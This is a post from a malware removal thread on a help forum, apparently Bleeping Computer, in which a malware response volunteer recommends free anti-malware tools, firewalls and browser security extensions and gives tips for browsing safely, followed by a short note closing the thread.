Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-Malware, Anti-Exploit and Anti-Ransomware

Having a decent security setup (which also includes an Antivirus) is the most crucial step to protect a system. These programs are additional layers of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Fortunately, the new Malwarebytes 3 bundles all these layers in one easy to use and efficient product. Malwarebytes 3 offers Malware, Web, Exploit and Ransomware protection modules that work together in order to keep your system protected and stop an infection at multiple levels.
  • Malwarebytes - Comes with a free trial of the Premium version for 14 days, after which it reverts back to the Free version
Note: Please note that only the Premium version of Malwarebytes 3 offers real-time protection (Malware, Web, Exploit and Ransomware). The free version only allows you to scan your system for threats and remove them.

Firewall

Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • GlassWire - Has both a free and paid version (with different packages)
  • Windows Firewall Control - Gives you more control over your Windows Firewall
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it
Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extension that allows you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far fewer chances to get infected by malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back to this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread? :)



#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:01:32 PM

Posted 13 January 2018 - 10:43 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.





